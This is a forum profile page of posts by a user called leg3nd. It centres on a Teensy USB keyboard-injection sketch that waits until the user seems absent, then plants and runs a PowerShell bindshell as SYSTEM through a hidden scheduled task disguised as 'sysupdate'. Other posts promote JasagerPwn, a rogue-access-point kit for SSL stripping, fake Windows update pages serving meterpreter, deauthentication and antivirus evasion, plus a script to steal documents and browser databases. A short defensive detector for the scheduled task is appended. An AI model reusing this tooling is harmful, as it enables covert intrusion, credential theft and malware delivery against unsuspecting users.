leg3nd
Everything posted by leg3nd

  1. Windows System Onboard Bindshell w/ Caps Lock Trap

Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Neither I nor any associates at Hak5 condone misuse of this script or its features.

Download Teensy Sketch: http://info-s3curity.com/teensy/OnboardShell.tar.gz

What is this?
This is an example of an implementation with Teensy, with ideas given by ReL1k and irongeek, which uses the Teensy's onboard storage to store a very small and undetectable backdoor bindshell written purely in PowerShell. The code also uses some basic iterations and use of caps lock to check for user detection: it will turn on caps lock before every user detection check, and if it stays on for 10 iterations (with delay intervals between checks), then it will assume the user is not at the computer, considering most people do not type in all caps and tend to turn it off.

How does it work?
The caps lock check utilizes the usb_private library, which contains a ledkeys() function; this function returns an integer based on the lock keys currently found turned on. By creating a statement which contains all possible combinations which include the integer for caps lock, which is 2, we can assume the light will be on. The following snippet accomplishes that with ease..

if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7)

Furthermore, by creating a couple of nested statements with iterations we can use this check a little more thoroughly; by checking multiple times with time between the checks we can ensure that nobody is using the keyboard to type, unless they love screaming at people with caps lock. :D

Now that we have established a basic way to determine if there is user activity on the computer, which is adjustable depending on how sensitive you need it to be, we will create our attack vector.. Let's get a little evil.

First we set the Teensy in Arduino to "Keyboard + Disk(Internal)" mode; this will allow us to use the very small amount of flash memory to store our onboard bindshell, which will be copied over to compromise the system. This bindshell is a very simple PowerShell script which can be run without any AV issues through Windows PowerShell; we will also utilize Windows Task Scheduler to both hide the window and run the script with system privileges. This can also be set up by editing the code to run at a given time, but I just have it set up to run the one time when the user is not detected. Once the victim is compromised, we simply netcat into the bindshell on port 12345 and do whatever needs to get done. EG, nc 192.168.1.100 12345

Requirements
A stock Teensy development board and Arduino development environment, no soldering or modifications required.
Windows 7 victim, and the user account must have Administrator privileges.

Note: Download the full sketch from the link above for use; it also contains the bindshell and setup for internal disk usage.

The code...
/* leg3nd's Windows powershell bindshell w/ system
   Based on PhukdLib by irongeek, powershell bindshell by Rel1k
   Detects user to implement attack based on capslock state
   -MUST BE SET TO KEYBOARD + DISK(INTERNAL) TO WORK */

#include "usb_private.h"

#define send_enter()     send_keys(KEY_ENTER, 0)
#define send_caps()      send_keys(KEY_CAPS_LOCK, 0)
#define send_windows()   send_keys(0, 128)
#define send_alt_y()     send_keys(KEY_Y, MODIFIERKEY_ALT)
#define send_windows_r() send_keys(KEY_R, MODIFIERKEY_GUI)

int attacked = 0;

void setup(){
  pinMode(11, OUTPUT);
  delay(5000);
  startDelay(30, 25); //startup blink
}

void loop(){
  delay(9000); // Time between attack checks
  if (!IsCapsOn()){ send_caps(); } //Turn on caps lock for trap
  int userState = 0;
  for (int m=9; m>=0; m--) { //Number of caps lock checks before attack, default = 10 checks
    delay(3000); //Delay between caps lock check iterations
    if (IsCapsOn()){
      delay(3000); //Delay after caps lock is found to be on
    } else {
      userState = userState + 1;
    }
  }
  if (userState>0){
    delay(300000); //Time to wait if user is detected, 300K = 5min
  } else {
    AdminCmd("cmd /c for /F %i in ('WMIC logicaldisk where \"DriveType=2\" list brief ^| find \"Windows\"') do copy /Y %i\\bind.ps1 %APPDATA%\\bind.ps1 && powershell -Command Set-ExecutionPolicy RemoteSigned");
    delay(200);
    AdminCmd("schtasks /create /tn sysupdate /tr \"powershell -File %APPDATA%\\bind.ps1 -WindowStyle Hidden\" /sc once /ru system /st 23:59:59");
    delay(200);
    AdminCmd("schtasks /run /tn sysupdate");
    delay(999999999); //Just chill, payload already executed (max 11.5 days)
  }
}

//Execute command as administrator
void AdminCmd(char *SomeCommand) {
  send_windows();
  delay(1500); //Delay for start menu to come up
  Keyboard.print(SomeCommand);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  send_enter();
  delay(1000); //Delay for UAC prompt
  send_alt_y();
}

//LED key checking for caps lock
int ledkeys(void){
  return int(keyboard_leds);
}

//Return the state of caps lock, regardless of other lights.
boolean IsCapsOn(){
  if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7){
    return true;
  } else {
    return false;
  }
}

//Key & Utility functions
void startDelay(int count, int dlay){ //debug testing light
  for (int i=0; i<count; i++){
    digitalWrite(11,HIGH);
    delay(dlay);
    digitalWrite(11,LOW);
    delay(100);
  }
}

void release_keys(){
  Keyboard.set_key1(0);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(100);
}

void send_keys(int key, int modifier){
  if(modifier) Keyboard.set_modifier(modifier);
  Keyboard.set_key1(key);
  Keyboard.send_now();
  delay(100);
  release_keys();
}

Enjoy responsibly! B)
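From the defender's side, the sketch above leaves a very recognizable host artifact: a one-shot scheduled task that runs PowerShell with a hidden window from %APPDATA% as SYSTEM. The following Python 3 triage check is an added example, not part of the original post; it scores scheduled-task records on those indicators. The CSV sample is constructed in the shape of `schtasks /query /fo CSV /v` output, trimmed to four columns whose names are assumed here.

```python
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo CSV /v` output,
# trimmed to the columns this check reads (column names are assumed).
# The second row mirrors the task the sketch above creates.
SAMPLE_CSV = r'''"TaskName","Task To Run","Run As User","Schedule Type"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\defrag.exe -c","SYSTEM","Weekly"
"\sysupdate","powershell -File C:\Users\bob\AppData\Roaming\bind.ps1 -WindowStyle Hidden","SYSTEM","One Time Only"
"\Backup","powershell.exe -File C:\Scripts\backup.ps1","bob","Daily"
'''

POWERSHELL_RE = re.compile(r'\bpowershell(?:\.exe)?\b', re.IGNORECASE)
# %APPDATA% left unexpanded, or its expanded form under a user profile
APPDATA_RE = re.compile(r'%APPDATA%|\\AppData\\', re.IGNORECASE)
HIDDEN_RE = re.compile(r'-WindowStyle\s+Hidden', re.IGNORECASE)
SYSTEM_USERS = {'SYSTEM', 'NT AUTHORITY\\SYSTEM'}


def task_indicators(task):
    """Return the indicator names that apply to one task record.

    Only PowerShell-backed tasks are scored; any other task yields [].
    """
    action = task.get('Task To Run', '')
    if not POWERSHELL_RE.search(action):
        return []
    hits = ['powershell']
    if APPDATA_RE.search(action):
        hits.append('script-in-appdata')
    if HIDDEN_RE.search(action):
        hits.append('hidden-window')
    if task.get('Run As User', '').strip().upper() in SYSTEM_USERS:
        hits.append('runs-as-system')
    if task.get('Schedule Type', '').strip().lower().startswith('one time'):
        hits.append('one-shot')
    return hits


def suspicious_tasks(csv_text, min_hits=3):
    """Parse schtasks CSV text and return (TaskName, indicators) for every
    task that trips at least min_hits indicators."""
    reader = csv.DictReader(io.StringIO(csv_text))
    flagged = []
    for row in reader:
        hits = task_indicators(row)
        if len(hits) >= min_hits:
            flagged.append((row['TaskName'], hits))
    return flagged


if __name__ == '__main__':
    for name, hits in suspicious_tasks(SAMPLE_CSV):
        print(name, ', '.join(hits))
```

A legitimate admin script run as SYSTEM from a fixed scripts directory only trips one indicator, so the threshold keeps it out of the result.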
  2. The majority of the script is complete and will remain the same; I only implement changes when I see something I really like, and that is all dynamic when you update it. As long as you just set up the variables you'll be set. In your case, everything you have said for the variables appears correct. WIFACE = "wlan1", IFACE = "wlan0", FONIFACE = "eth0", WiFiMode = "1" (so you do not deauth your internal wireless card). Other than that, just make sure the dhcp configuration and the pineapple are set up with the correct subnets and it's good to go.
  3. No, I don't think port forwarding would be necessary for any of it. It sounds to me like some kind of issue with that specific wireless access point. Maybe something like wireless isolation is causing a problem, or some kind of DNS filter? I have never heard of this problem, so perhaps someone else can shed some light on the issue and I can try to make a workaround. I would pop into the router and look through the settings. It seems like something in there is causing the problem if you can use other access points or your mobile phone for internet.
  4. You have given me multiple subnets which don't seem to make sense. The pineapple network as you have explained should be on the 192.168.10.0 255.255.255.0 subnet, with an IP of 192.168.10.1; the attacker machine (fonIP) should be set to 192.168.10.2. This is all assuming the configuration you had posted yesterday. I would try setting it up to use this subnet and see if it works. The script should run fine with the default settings and subnet mentioned above, besides "IFACE", which you need to set to the wireless card you are using. The subnet for the internet connectivity, such as the wireless router you're trying to tunnel the connection through, is irrelevant; the subnet should not matter at all as it's tunneled from the interface and not the IPs. The pineapple should not have the ability to ping when you SSH into it, because it does not have a DNS server assigned to it. The internet will only work for people who are assigned an IP address from your DHCP server running on the attacking machine. I will try to add a function to configure the pineapple and script when I get some time.
  5. Please use code tags when posting large amounts of information. The configuration looks generally correct. The pineapple appears to be configured correctly and the script settings appear to be okay as well, although you did not give me a description of the topology as requested, so it's pretty hard to know. Try using a different wireless card as the "IFACE" variable; perhaps using it for attacks with monitor mode is causing problems. You may want to play around with it and try to get some more information on what exactly the issue may be. For example, try to use one of the attacks and see if they even work, as they do not require any internet connection at all to function. Furthermore, you should respond with some basic troubleshooting information you have gathered from testing and tweaking your setup, such as:
Test connectivity to pineapple: ping 192.168.10.1
Test connectivity to DNS server: ping 4.2.2.2
Test DNS functionality: ping google.com
  6. When the script is running it should be set to 4.2.2.2, but if you need to try it manually it's simply: echo "nameserver 4.2.2.2" > /etc/resolv.conf
  7. Alfa is not your only choice either, with the release of backtrack 5 many other wifi cards are now supported by default. Including the majority of broadcom cards and netgear wg111's. Check the BackTrack 5 "Hardware compatibility" forum for more information: http://www.backtrack-linux.org/forums/backtrack-5-hardware-compatibility-list/ Another place to look for compatible cards of course would be: http://www.aircrack-ng.org/doku.php?id=compatible_cards
  8. You need to be much more specific with your issues for me to troubleshoot it. At which point are the requests failing? For example, in the java attack, the fake update attack, or in normal internet connectivity. Please use pastebin or use code tags and post the top of the script (the configuration) as well as a description of the network topology you're trying to use with it.

General DNS troubleshooting...

While the script is running, run "cat /etc/resolv.conf" and ensure it outputs "nameserver 4.2.2.2".

Ensure you have dnsmasq disabled on the fon; ssh into it and run: /etc/init.d/dnsmasq stop && /etc/init.d/dnsmasq disable

Ensure you have the interfaces in the script configured correctly to forward your internet connection.
WIFACE should be the wireless card used for attacking and de-authorization, such as an alfa.
FONIFACE should be the ethernet interface that is connected to the pineapple/fon.
IFACE should be the interface that you are sharing the connection from, which can be from a phone or a wireless AP.
  9. That is the IP address of your attacking computer which is facing the pineapple via ethernet. It should also be the same IP represented in the $fonIP variable. For the setup it appears you're trying to use, the topology would be something like:
Pineapple: No DHCP (dnsmasq) running, 192.168.0.1
fonIP variable (attacker computer): 192.168.0.2
I will update the script to use that fonIP variable in that configuration instead and update the comments to be a little easier to understand.
  10. You will need to configure both the pineapple and the variables/settings in the top of the script to reflect your network settings. The default configuration for jasagerPwn uses the 192.168.10.0/24 subnet.
  11. Yeah sorry, I think it changed since bt4 and I did not notice. The correct method should be something along these lines.

Twisted web (I've only gotten this to work on 32 bit):
apt-get update && apt-get -y install python-twisted-bin python-twisted-core python-twisted-web python-twisted-web2

Install SET and airdrop-ng (I think airdrop-ng is scripted to be installed regardless):
cd /pentest/exploits/set/ && chmod +x setup.py && python setup.py && cd /pentest/wireless/aircrack-ng/scripts/airdrop-ng/ && chmod +x install.py && python install.py

I updated the wiki and installHowTo files. They may already be installed in BT5, at least some of them, but I'm not sure. The script should install most of it during the dependency checks as well; still, you're probably better off being safe and just installing it manually, because I may have forgotten something.
  12. Ah okay, that makes sense. I was never able to figure out what was causing it, but it was pretty blatant that a real router was needed over the soft AP. Thanks for the clarification. There is a "Wiki/Installation" page on the googlecode website that explains the setup, as well as a text file with similar information that comes with the script. You just have to set up your subnets and disable dnsmasq (DHCP server) on your FON; the script handles the rest pretty much.
  13. Actually yes. The original concept of this script was based on airbase-ng, but I converted it over to Jasager because airbase-ng uses different methodology to implement jasager, allowing only a couple of clients at a time with glitchy and unreliable results. After getting a pineapple I experienced MUCH more reliable results, as well as the ability to maintain 20+ clients at once. Airbase-ng can get the job done for research, but I recommend a real Jasager router for professional work and audits. EDIT: Edited for accuracy from digininja's information.
  14. Yeah my god.. All those nested iterations and statements.. I'm not sure if it could be any more un-pythonic lol. And I am honestly no python master; I consider myself a beginner at best really.. If you wanna check out some real pros, hop into #python. Some of the guys in there really know their stuff (although some don't always explain it in the easiest manner, in my experience).
  15. Ah, kind of a weird issue. But I have seen that 00:00:00:00:00 pop up with airdrop and airodump a few times as well, never really figured out why. But hey whatever gets the job done! Hope it helped, Good luck.
  16. I'm rocking BT5-Gnome-32 on my Macbook Pro, as stated here, http://www.backtrack-linux.org/forums/backtrack-5-hardware-compatibility-list/41189-macbook-pro-bcm4328-r5-b-g-n-%5Bworking%5D.html and BT5-Gnome-64 on my main tower. I already have a custom ubuntu image on one of my droids, but will probably switch to the ARM image once I get some time. As for why Gnome>KDE, personal preference I suppose, although KDE4 does look pretty clean. 10/10 to the BackTrack team. Great job.
  17. Okay I got a couple of ideas for yea.. If you wanna keep it sexy and pythonic, how about some RegEx B)

import commands, re

def getmac(iface):
    ifconfig = commands.getoutput("ifconfig " + iface)
    mac = re.search('\w\w:\w\w:.+\n', ifconfig)
    if mac is None:
        parsedMac = 'Mac not found'
    else:
        parsedMac = mac.group()
    print parsedMac #Or use return here.

getmac('eth0')

Considering you're rockin' ifconfig already, could also get kinda bourne with it (More my style :D )

import commands

def getmac(iface):
    ifconfig = commands.getoutput("ifconfig " + iface + " | grep HWaddr | awk '{ print $5 }'")
    if len(ifconfig) != 17:
        mac = 'Mac not found'
    else:
        mac = ifconfig
    print mac #Or use return here.

getmac('eth0')

Hope this helps you out a bit.. If you wanna dive into the 1337 world of python, I recommend these awesome videos from google to start out. http://www.youtube.com/results?search_query=google+python+class&aq=f Enjoy!
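A more robust take on the same task, as an added Python 3 example that is not from the original post: the regex is anchored to the HWaddr/ether keyword, so it also handles the newer ifconfig layout and cannot latch onto stray colon-separated text such as an inet6 address, and the function returns None instead of a loose match. The sample outputs are constructed, not captured from a real host.

```python
import re
import subprocess

# Matches the MAC after the "HWaddr" keyword (legacy net-tools output) or
# the "ether" keyword (newer net-tools), so colon-separated text elsewhere
# in the output, such as inet6 addresses, is never picked up.
MAC_RE = re.compile(
    r'\b(?:HWaddr|ether)\s+([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\b')


def parse_mac(ifconfig_output):
    """Return the interface MAC (lowercase) from ifconfig text, or None."""
    m = MAC_RE.search(ifconfig_output)
    return m.group(1).lower() if m else None


def getmac(iface):
    """Run ifconfig for one interface and return its MAC, or None if the
    command is missing, fails, or prints no recognizable address."""
    try:
        proc = subprocess.run(['ifconfig', iface], capture_output=True,
                              text=True, check=False)
    except FileNotFoundError:
        return None
    return parse_mac(proc.stdout)


# Constructed sample outputs in the two ifconfig layouts, plus an
# interface that has no hardware address at all.
LEGACY_OUTPUT = """eth0      Link encap:Ethernet  HWaddr 00:1C:42:AB:CD:EF
          inet addr:10.0.2.15  Bcast:10.0.2.255  Mask:255.255.255.0
"""
MODERN_OUTPUT = """eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::21c:42ff:feab:cdef  prefixlen 64  scopeid 0x20<link>
        ether 00:1c:42:ab:cd:ef  txqueuelen 1000  (Ethernet)
"""
LOOPBACK_OUTPUT = """lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
"""

if __name__ == '__main__':
    for label, text in (('legacy', LEGACY_OUTPUT), ('modern', MODERN_OUTPUT),
                        ('loopback', LOOPBACK_OUTPUT)):
        print(label, parse_mac(text))
```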
  18. Awesome! I am also pleased to announce that I have made some major changes to the FakeUpdate attack vector, now *nix and OSX victims will receive a Java Applet much like the SET vector which will allow for a much more effective vector in terms of Mac / Linux. I will be releasing this later on tonight or tomorrow most likely along with some other minor changes.
  19. It is totally possible. You guys are simply not thinking "outside the box". Keep in mind you're NOT limited to arduino here; you have full keyboard and mouse functionality, giving you command execution, therefore also giving you access to native languages. EG: Powershell, Batch, and VBS. As for "It cannot read data": also not thinking outside the box, windows has native FTP and TFTP. Networking handles the data. I have an entire file collection script which I will consider throwing on here later on to show you guys how insanely effective it is. As of now (only had my teensy for a week), it steals tons of recent documents, firefox SQLite databases, printer spool documents, and tons of other potentially "interesting" information. Although it would be very simple to add in additional functionality to it.
  20. Thanks for the quick replies and support, it's appreciated. I have the video uploaded and fixed a few bugs; I will be updating the main post with the correct information shortly. UPDATE: I have had a few major bugs personally reported to me regarding the usage of this in BackTrack 5 and possibly other distros. Make sure to update your script before trying it out via googlecode or the -U/-u switches. Good luck to all, please report all other bugs to me.
  21. JasagerPwn Version 1.4

Considering the MK3 has been released and the thread has been unpinned, I will no longer be checking this or providing support, but will continue to keep the googlecode page updated.

Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Neither I nor any associates at Hak5 condone misuse of this script or its features.

Notes from developer: Please leave your feedback regarding your experience while using this script (good or bad), ideas for future development, improvements, and bugs. Feedback is what will keep me developing and spending my free time implementing new attacks for public use. The video is older and gives a basic idea of the script, but things such as the FakeUpdate attack vector are now OS agnostic, as well as many other improvements. The googlecode page has been changed; ensure you have the most current version from the links below or else you will get errors and not receive updates. Thanks.

Script Download: JasagerPwn @ Infos3c (Right Click > Save As)
Google Code: http://code.google.com/p/jasagerpwn/
Video Download: http://blip.tv/file/get/Leg3ndary-JasagerPwnScript532.flv (Right Click > Save As)
Video Online: http://blip.tv/file/5143877

What does this do?
This is a bash script designed for BackTrack 4/5 or other Ubuntu based distributions. It utilizes the powerful Jasager firmware on a rogue access point, allowing the attacker to seamlessly implement different attacks based on their current situation. These attacks use popular frameworks such as Metasploit, Social Engineering Toolkit, and SSL Strip.
The intention of this script is to allow seamless utilization of all the attacks with ease, allowing your client-side attacks' success rate and the speed of the setups to skyrocket.

Included Features:

SSL Strip: The powerful python implementation by none other than Moxie Marlinspike. This attack will strip out all SSL encryption from websites such as Gmail, Paypal, Chase, and similar "secured" websites. While you are in the middle with your access point, you can see the passwords pass through your system in cleartext, allowing you to gain full access to various accounts.

FakeUpdate: This forces your WLAN clients via IPtables to a custom website setup I created using a main index.php which redirects the user based on the client OS detected. For example, if they are on Microsoft Windows, they will be redirected to a Microsoft Security Update page with a download link to a meterpreter reverse_tcp payload. As of rev7, this has support for OSX/Linux via Java Applets. Much more viable now!

BrowserPwn: This forces your WLAN clients via IPtables to a web server running the Metasploit BrowserAutopwn auxiliary module. The module contains various browser based exploits which will be run against your clients in hope of a meterpreter or shell payload being run. Works relatively well depending on the patch levels of your clients and the current exploits available at the time; ensure to use msfupdate or -U before.

JavaPwn: This is an attack vector from the Social Engineering Toolkit, by ReL1k. It forces your WLAN clients via IPtables to either a Google or Java Required web template which will pop up a "Secure signed java applet". This applet will contain a corresponding payload for the client and is highly effective, as most users do not realize the potential risk of java applets. Probably my personal favorite, with the highest success rate.
- This now utilizes a new powershell meterpreter injection technique straight into memory, bypassing all windows anti-viruses on Vista and Windows 7. As of v1.3 r53.

DeAuthorization: This section contains multiple ways to deauthorize clients on other access points in hope that they will connect to yours. A kind of "reverse war driving" (-Darren Kitchen). In my opinion this should always be running when you're out in the wild; it will pull in clients and up your success rate substantially.

Airdrop-ng: A rule-based deauth attack which is by far the most effective method of collecting clients. You can add custom rules to the configuration via the "script/network" settings section as needed. By default you should have yourself on here if you set up the variables correctly.

Mass DeAuth: A basic implementation of 'aireplay-ng -0 -D' built into a bash script I wrote. Somewhat effective if you cannot use airdrop-ng.

Single DeAuth: Pretty self descriptive; allows you to check out the clients and set up attacks to grab them specifically. Useful in some situations.

Script/Network Settings: Some basic settings for the script and your network which can be changed "on the fly". Mostly stuff I found useful while testing the script in different situations. These include editing your airdrop-ng deauth configuration, changing your gateway interface, and refreshing your internet connection (DHCP/DNS).

Compatibility: This was created with intentions for Alfa AWUS036H, Backtrack 4/5, and a Jasager powered router, although it will likely work with other wireless cards and other Ubuntu based distributions if set up correctly.

Known Issues:
Extensive testing in lab environments can cause both the attacking and victim machine to run into connectivity issues. Reboots during testing can solve many issues on both sides.
DHCP issues with the Mark 3 - currently looking for a fix.

ChangeLog:
Revision 3: Reset revision numbers with new googlecode page.
Revision 5: Fixed update functions for new googlecode links.
Revision 6: Added MUCH more stable dependency installations.
Revision 7: Redesigned FakeUpdate with java applet for OSX/Linux.
Revision 8: Added "Java Repeater" functionality to FakeUpdate OSX/Linux.
Revision 19: Lots of minor stability changes. Updates to go with new versions of SET.
Revision 26: Removed SET all together. Java attacks are now implemented by jasagerPwn.
Revision 30: Removed DNSspoof and used metasploit fakeDNS instead for stability. Other major changes.
Revision 51: Added ability to set gateway static, other basic changes.
Revision 53: Added new powershell payload deployment. No more anti-virus issues.. EVER!
Revision 63: Added obfuscation of normal windows payloads. Streamlined code and added NGREP script.